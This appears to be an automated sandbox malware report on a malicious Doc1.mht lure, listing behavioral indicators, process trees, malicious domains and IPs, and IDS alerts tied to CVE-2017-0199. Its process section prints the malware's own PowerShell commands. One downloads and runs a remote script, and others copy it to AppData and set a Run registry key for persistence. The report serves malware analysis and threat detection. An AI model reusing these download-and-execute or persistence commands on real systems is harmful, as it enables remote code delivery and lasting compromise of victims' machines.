analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Doc1.mht

Full analysis: https://app.any.run/tasks/35d05df3-fe9f-48d9-8fca-7051e3933938
Verdict: Malicious activity
Analysis date: June 18, 2019, 18:19:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: MIME entity, ISO-8859 text, with CRLF line terminators
MD5:

C4C2FDCFA0B3414D88EBCF4505D9B409

SHA1:

6ECB340C4A35001AE3C2BD2D35DAA24A13E55ABB

SHA256:

CCA2CFA18C0AFD98360263BD06BE5CBF9CB80AEDBC1B7786692D058881E7CE3A

SSDEEP:

6144:DJ1LHeGrJs7pH1np6+9F+x2UyvP5wwzWZpz:DvXruV1pX+4US5w2m

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3836)

    • Changes the autorun value in the registry

      • powershell.exe (PID: 2260)

    • Loads the Task Scheduler COM API

      • mmc.exe (PID: 1940)

    • Writes to a start menu file

      • powershell.exe (PID: 2448)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 4036)

    • Creates files in the user directory

      • powershell.exe (PID: 2708)
      • powershell.exe (PID: 3756)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2096)

    • Executed via COM

      • mshta.exe (PID: 4036)

    • Executes scripts

      • powershell.exe (PID: 2708)
      • powershell.exe (PID: 3756)

    • Executes PowerShell scripts

      • wscript.exe (PID: 2640)
      • WScript.exe (PID: 4060)

  • INFO

    • Reads Microsoft Office registry keys

      • iexplore.exe (PID: 3072)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3488)
      • iexplore.exe (PID: 3072)
      • iexplore.exe (PID: 3484)

    • Reads internet explorer settings

      • iexplore.exe (PID: 3488)
      • iexplore.exe (PID: 3484)
      • mshta.exe (PID: 4036)

    • Changes internet zones settings

      • iexplore.exe (PID: 3072)

    • Creates files in the user directory

      • iexplore.exe (PID: 3484)

    • Reads settings of System Certificates

      • iexplore.exe (PID: 3072)
      • powershell.exe (PID: 2708)

    • Application launched itself

      • iexplore.exe (PID: 3072)

    • Changes settings of System certificates

      • iexplore.exe (PID: 3072)

    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 3072)

    • Manual execution by user

      • calc.exe (PID: 2380)
      • mmc.exe (PID: 3552)
      • mmc.exe (PID: 1940)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.mht/mhtml | MIME HTML archive format (var 2) (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
58
Monitored processes
15
Malicious processes
6
Suspicious processes
2

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe no specs iexplore.exe mshta.exe cmd.exe no specs powershell.exe wscript.exe no specs powershell.exe no specs wscript.exe no specs powershell.exe powershell.exe powershell.exe calc.exe no specs mmc.exe no specs mmc.exe

Process information

PID
CMD
Path
Indicators
Parent process
3072"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\Desktop\Doc1.mhtC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3488"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3072 CREDAT:79873C:\Program Files\Internet Explorer\iexplore.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3484"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3072 CREDAT:203009C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
4036C:\Windows\System32\mshta.exe -EmbeddingC:\Windows\System32\mshta.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3836"C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('https://briargrove.org/wp-includes/microsoft.js','%temp%\microsoft.js'); Start '%temp%\microsoft.js'C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2708powershell (new-object System.Net.WebClienT).DownloadFile('https://briargrove.org/wp-includes/microsoft.js','C:\Users\admin\AppData\Local\Temp\microsoft.js'); Start 'C:\Users\admin\AppData\Local\Temp\microsoft.js'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4060"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\microsoft.js" C:\Windows\System32\WScript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3756"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Local\Temp\microsoft.js'));wscript 'C:\Users\admin\AppData\Roaming\microsoft.js'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2640"C:\Windows\system32\wscript.exe" C:\Users\admin\AppData\Roaming\microsoft.jsC:\Windows\system32\wscript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2260"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\admin\AppData\Roaming\microsoft.js' -PropertyType String -Force;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 133
Read events
1 711
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
11
Text files
19
Unknown types
6

Dropped files

PID
Process
Filename
Type
3072iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
MD5:
SHA256:
3072iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3484iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\F44N9BJ2\Review[1].php
MD5:
SHA256:
3072iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFCBA326C545C1B121.TMP
MD5:
SHA256:
3488iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\wbkF07A.tmphtml
MD5:090232B3C8F92ACEB847204FCE291D4A
SHA256:173492875620017611F1E174F6467DCF066172E7D4F7659C4F2085E943A3D25B
3488iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\wbkF2F2.tmpimage
MD5:35724C96044F72731721C2B2C13F60BA
SHA256:025A51F120D4CB2DE056865637E3B83BA544CCA58CB05D2D258E01C1D268858E
3488iexplore.exeC:\Users\admin\AppData\Local\Temp\VGXF0DB.tmpimage
MD5:35724C96044F72731721C2B2C13F60BA
SHA256:025A51F120D4CB2DE056865637E3B83BA544CCA58CB05D2D258E01C1D268858E
3488iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\wbkF0DA.tmpimage
MD5:35724C96044F72731721C2B2C13F60BA
SHA256:025A51F120D4CB2DE056865637E3B83BA544CCA58CB05D2D258E01C1D268858E
3488iexplore.exeC:\Users\admin\AppData\Local\Temp\VGXF2F3.tmpimage
MD5:35724C96044F72731721C2B2C13F60BA
SHA256:025A51F120D4CB2DE056865637E3B83BA544CCA58CB05D2D258E01C1D268858E
3488iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\wbkF2B1.tmphtml
MD5:090232B3C8F92ACEB847204FCE291D4A
SHA256:173492875620017611F1E174F6467DCF066172E7D4F7659C4F2085E943A3D25B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
13
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3484
iexplore.exe
GET
193.56.28.128:80
http://docandpdfonline.servepics.com/microsoft.hta
unknown
malicious
4036
mshta.exe
GET
193.56.28.128:80
http://docandpdfonline.servepics.com/microsoft.hta
unknown
malicious
3072
iexplore.exe
GET
404
193.56.28.128:80
http://docandpdfonline.servepics.com/images/favicon.ico
unknown
html
311 b
malicious
3484
iexplore.exe
GET
200
193.56.28.128:80
http://docandpdfonline.servepics.com/Review.php
unknown
html
293 b
malicious
3072
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3072
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2708
powershell.exe
166.62.121.61:443
briargrove.org
GoDaddy.com, LLC
US
suspicious
3072
iexplore.exe
193.56.28.128:80
docandpdfonline.servepics.com
malicious
4036
mshta.exe
193.56.28.128:80
docandpdfonline.servepics.com
malicious
2096
powershell.exe
194.5.98.253:5478
FR
malicious
3484
iexplore.exe
193.56.28.128:80
docandpdfonline.servepics.com
malicious
193.56.28.134:5478
malicious
2096
powershell.exe
193.56.28.134:5478
malicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
docandpdfonline.servepics.com
  • 193.56.28.128
malicious
briargrove.org
  • 166.62.121.61
suspicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
3484
iexplore.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
3484
iexplore.exe
Attempted User Privilege Gain
ET WEB_CLIENT GENERIC VB ShellExecute Function Inside of VBSCRIPT tag
4036
mshta.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
4036
mshta.exe
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
4036
mshta.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS MSXMLHTTP DL of HTA (Observed in CVE-2017-0199)
4036
mshta.exe
Attempted User Privilege Gain
ET WEB_CLIENT GENERIC VB ShellExecute Function Inside of VBSCRIPT tag
Process
Message
mmc.exe
Constructor: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe
OnInitialize: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe
AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe
ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Doc1.mht